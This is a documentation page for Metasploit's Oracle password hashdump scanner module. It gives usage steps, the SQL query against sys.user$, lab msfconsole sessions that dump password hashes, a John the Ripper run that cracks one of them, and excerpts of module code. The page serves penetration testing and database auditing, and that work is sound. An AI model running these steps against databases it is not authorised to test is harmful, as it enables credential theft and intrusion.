Oracle Password Hashdump - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/oracle/oracle_hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
Source code: modules/auxiliary/scanner/oracle/oracle_hashdump.rb
Disclosure date: -
Last modification time: 2019-03-28 10:06:56 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 1521
List of CVEs: -
This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast. This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/oracle/oracle_hashdump
msf auxiliary(oracle_hashdump) > show options
... show and set options ...
msf auxiliary(oracle_hashdump) > set RHOSTS ip-range
msf auxiliary(oracle_hashdump) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(oracle_hashdump) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(oracle_hashdump) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(oracle_hashdump) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Preparation: 6 steps
- Oracle DB XE (Express Edition) can be downloaded for free here.
- Install Oracle Database and create a database. Versions 8i through 12c are supported.
On your Oracle DB machine, make sure you can ping the DB server using the
tnsping [SID]
command. Iftnsping
is not in your path upon installation, you will have to locate it manually.- On a Windows machine, for Oracle 11g,
tnsping.exe
is located at:oracle_install\app\oracle\product\<version, ie 11.2.0)\server\bin\tnsping.exe
. - On a Windows machine, for Oracle 12c and 18c, it is located at
%ORACLE_HOME%\bin\tnsping.exe
.
After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
C:> tnsping staticdb ... Used TNSNAMES adapter to resolve the alias Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb))) OK (0 msec)
If
tnsping
fails, make sure the listener is setup correctly. See this Oracle doc for more information about its configuration.- On a Windows machine, for Oracle 11g,
Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
- 12c:
SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'
- pre-12c:
SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'
- 12c:
Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client. View the setup tutorial here
Make sure you have a database connected to MSF (postgresql). This can be done through
msfdb
tool or throughdb_connect
command inmsfconsole
.
Verification Steps
- Start
msfconsole
- Do:
use auxiliary/scanner/oracle/oracle_hashdump.rb
- Do:
run
- If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
- You may view saved credentials with
creds
command. These are used for cracking by modulejtr_oracle_fast
.
Options
DBPASS The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
DBUSER The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
RPORT The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
SID
The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation).
Default is ORCL
(default Oracle install value) or XE
for free edition.
Scenarios
Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS hunter2 yes The password to authenticate with.
DBUSER scott yes The username to authenticate with.
RHOST 127.0.0.1 yes The Oracle host.
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 1522 yes The TNS port.
SID staticdb yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running 12c
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
...
SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ -------
... ----- ------------ ----------
127.0.0.1 127.0.0.1 1522/tcp (oracle) SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699 Nonreplayable hash oracle12c
These hashes are then saved as credentials so that jtr_oracle_fast
can crack them (using John The Ripper "bleeding_jumbo").
msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
msf5 auxiliary(analyze/jtr_oracle_fast) > run
...
[*] Cracking oracle12c hashes in normal wordlist mode...
Using default input encoding: UTF-8
[*] Cracking oracle12c hashes in single mode...
Using default input encoding: UTF-8
[*] Cracked passwords this run:
[+] SCOTT:hunter2
...
Oracle 18c (18.4 XE) on Windows 2012
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
resource (oracle.rb)> run
[-] Version 18c is not currently supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Oracle 11g (11.2 XE) on Windows 2012
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
verbose => true
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running version 11g
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
APEX_040000 S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
APEX_PUBLIC_USER S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
APPQOSSYS S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
CTXSYS S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
DBSNMP S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
DIP S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
FLOWS_FILES S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
HR S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
MDSYS S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
ORACLE_OCM S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
OUTLN S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
SYS S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
SYSTEM S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
XDB S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
XS$NULL S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/oracle/oracle_hashdump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/oracle/oracle_hashdump
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show info
Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
theLightCosine <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate with.
DBUSER SCOTT yes The username to authenticate with.
RHOST yes The Oracle host.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module dumps the usernames and password hashes from Oracle
given the proper Credentials and SID. These are then stored as creds
for later cracking using auxiliary/analyze/jtr_oracle_fast. This
module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
Module Options
This is a complete list of options available in the scanner/oracle/oracle_hashdump auxiliary module:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate with.
DBUSER SCOTT yes The username to authenticate with.
RHOST yes The Oracle host.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/oracle/oracle_hashdump auxiliary module:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show advanced
Module advanced options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/oracle/oracle_hashdump module can do:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/oracle/oracle_hashdump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- An error has occurred while querying for the Oracle version. Please check your OPTIONS
- Version 18c is not currently supported
- Error: Oracle DB version not supported.nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.nDumping unsupported version info:n<VER:0>
- An error occurred. The supplied credentials may not have proper privileges
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
An error has occurred while querying for the Oracle version. Please check your OPTIONS
Here is a relevant code snippet related to the "An error has occurred while querying for the Oracle version. Please check your OPTIONS" error message:
30: # 11g uses SHA-1 while 8i-10g use DES
31: query = 'select * from v$version'
32: ver = prepare_exec(query)
33:
34: if ver.nil?
35: print_error("An error has occurred while querying for the Oracle version. Please check your OPTIONS")
36: return
37: end
38:
39: unless ver.empty?
40: case
Version 18c is not currently supported
Here is a relevant code snippet related to the "Version 18c is not currently supported" error message:
47: when ver[0].include?('11g')
48: ver='11g'
49: when ver[0].include?('12c')
50: ver='12c'
51: when ver[0].include?('18c')
52: print_error("Version 18c is not currently supported")
53: return
54: else
55: print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
56: return
57: end
Error: Oracle DB version not supported.nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.nDumping unsupported version info:n<VER:0>
Here is a relevant code snippet related to the "Error: Oracle DB version not supported.nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.nDumping unsupported version info:n<VER:0>" error message:
50: ver='12c'
51: when ver[0].include?('18c')
52: print_error("Version 18c is not currently supported")
53: return
54: else
55: print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
56: return
57: end
58: vprint_status("Server is running version #{ver}")
59: end
60:
An error occurred. The supplied credentials may not have proper privileges
Here is a relevant code snippet related to the "An error occurred. The supplied credentials may not have proper privileges" error message:
93: tbl << row
94: end
95: end
96: end
97: rescue => e
98: print_error("An error occurred. The supplied credentials may not have proper privileges")
99: return
100: end
101: print_status("Hash table :\n #{tbl}")
102: report_hashes(tbl, ver, ip, this_service)
103: end
Go back to menu.
Related Pull Requests
- #11623 Merged Pull Request: Add 12c support for oracle_hashdump
- #11351 Merged Pull Request: jtr modernizations (again again again)
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8697 Merged Pull Request: fixes oracle_hashdump and jtr_oracle_fast modules
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7200 Merged Pull Request: Rex::Ui::Text cleanup
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/scanner/oracle/oracle_login
- auxiliary/scanner/http/oracle_demantra_database_credentials_leak
- auxiliary/scanner/http/oracle_demantra_file_retrieval
- auxiliary/scanner/http/oracle_ilom_login
- auxiliary/scanner/oracle/emc_sid
- auxiliary/scanner/oracle/isqlplus_login
- auxiliary/scanner/oracle/isqlplus_sidbrute
- auxiliary/scanner/oracle/sid_brute
- auxiliary/scanner/oracle/sid_enum
- auxiliary/scanner/oracle/spy_sid
- auxiliary/scanner/oracle/tnslsnr_version
- auxiliary/scanner/oracle/tnspoison_checker
- auxiliary/scanner/oracle/xdb_sid
- auxiliary/scanner/oracle/xdb_sid_brute
- auxiliary/admin/oracle/oracle_index_privesc
- auxiliary/admin/oracle/oracle_login
- auxiliary/admin/oracle/oracle_sql
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/oracle_reports_rce
- exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
- exploit/unix/webapp/oracle_vm_agent_utl
- exploit/windows/browser/oracle_autovue_setmarkupmode
- exploit/windows/browser/oracle_dc_submittoexpress
- exploit/windows/browser/oracle_webcenter_checkoutandopen
- exploit/windows/http/oracle_beehive_evaluation
- exploit/windows/http/oracle_beehive_prepareaudiotoplay
- exploit/windows/http/oracle_btm_writetofile
- exploit/windows/http/oracle_endeca_exec
- exploit/windows/http/oracle_event_processing_upload
- auxiliary/scanner/ssl/bleichenbacher_oracle
- auxiliary/gather/ldap_hashdump
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump
- auxiliary/scanner/postgres/postgres_hashdump
- auxiliary/admin/oracle/oraenum
- auxiliary/admin/oracle/ora_ntlm_stealer
- auxiliary/admin/oracle/osb_execqr
- auxiliary/admin/oracle/osb_execqr2
- auxiliary/admin/oracle/osb_execqr3
- auxiliary/admin/oracle/post_exploitation/win32exec
- auxiliary/admin/oracle/post_exploitation/win32upload
- auxiliary/admin/oracle/sid_brute
- auxiliary/admin/oracle/tnscmd
- auxiliary/sqli/oracle/dbms_cdc_ipublish
- auxiliary/sqli/oracle/dbms_cdc_publish
- auxiliary/sqli/oracle/dbms_cdc_publish2
- auxiliary/sqli/oracle/dbms_cdc_publish3
- auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription
- auxiliary/sqli/oracle/dbms_export_extension
- auxiliary/sqli/oracle/dbms_metadata_get_granted_xml
- auxiliary/sqli/oracle/dbms_metadata_get_xml
- auxiliary/sqli/oracle/dbms_metadata_open
- auxiliary/sqli/oracle/droptable_trigger
- auxiliary/sqli/oracle/jvm_os_code_10g
- auxiliary/sqli/oracle/jvm_os_code_11g
- auxiliary/sqli/oracle/lt_compressworkspace
- auxiliary/sqli/oracle/lt_findricset_cursor
- auxiliary/sqli/oracle/lt_mergeworkspace
- auxiliary/sqli/oracle/lt_removeworkspace
- auxiliary/sqli/oracle/lt_rollbackworkspace
- exploit/windows/oracle/client_system_analyzer_upload
- exploit/windows/oracle/extjob
- exploit/windows/oracle/osb_ndmp_auth
- exploit/windows/oracle/tns_arguments
- exploit/windows/oracle/tns_auth_sesskey
- exploit/windows/oracle/tns_service_name
Authors
- theLightCosine
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.